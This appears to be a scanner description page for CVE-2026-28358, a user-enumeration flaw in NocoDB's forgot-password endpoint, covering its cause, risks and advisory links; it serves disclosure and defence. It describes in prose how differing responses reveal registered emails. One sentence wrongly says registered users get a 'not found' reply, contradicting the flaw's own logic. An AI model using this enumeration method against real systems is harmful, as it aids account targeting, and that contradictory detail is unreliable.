CVE-2026-28358 Scanner

NocoDB is widely used for creating database solutions with a spreadsheet-like interface, favored in organizations for its ease of managing data. It enables users to collaborate and build data-driven applications without deep technical expertise. The user-friendly environment is popular among non-developers and professionals who require a reliable database solution. Despite its simplicity, it offers flexibility and functionality to handle large datasets. Primarily aimed at small enterprises, it's also utilized by larger organizations seeking quicker project rollouts. Overall, it serves as a valuable tool for managing and manipulating data with minimal complexity.

The vulnerability present in NocoDB before version 0.301.3 allows attackers to perform user enumeration. By exploiting the password forgot endpoint, malicious users can determine if a given email address is registered. This information can be utilized for crafting further targeted attacks against registered users. User enumeration might lead to increased risk of account-based attacks. It highlights the need for careful handling of user input and responses to prevent such disclosures. Proper software patching and updates are essential to mitigate these vulnerabilities.

Technical details reveal that the vulnerability resides in the password forgot functionality of NocoDB. Specifically, it occurs because the endpoint provides distinct responses for registered compared to unregistered emails. An example of a vulnerable request includes sending a POST request with a tested email to the authentication endpoint. Registered users receive responses stating the email is not found. Attackers might automate this process against multiple email addresses to identify legitimate accounts. Organization administrators must be aware of these indicators to protect system integrity.

Exploitation of this vulnerability can lead to potential exposure to account-based attacks. If malicious individuals determine the existence of user accounts, they might launch subsequent phishing or brute force attacks. Unauthorized access to critical applications may follow if attackers leverage discovered user information efficiently. Such discovery might also lead to privacy breaches related to users' data. The recognition and utilization of registered user emails serve as a stepping stone for larger scale exploitation. Prevention and rapid patching of affected systems minimize this risk significantly.

REFERENCES

• https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php
• https://github.com/nocodb/nocodb/releases/tag/0.301.3
• https://nvd.nist.gov/vuln/detail/CVE-2026-28358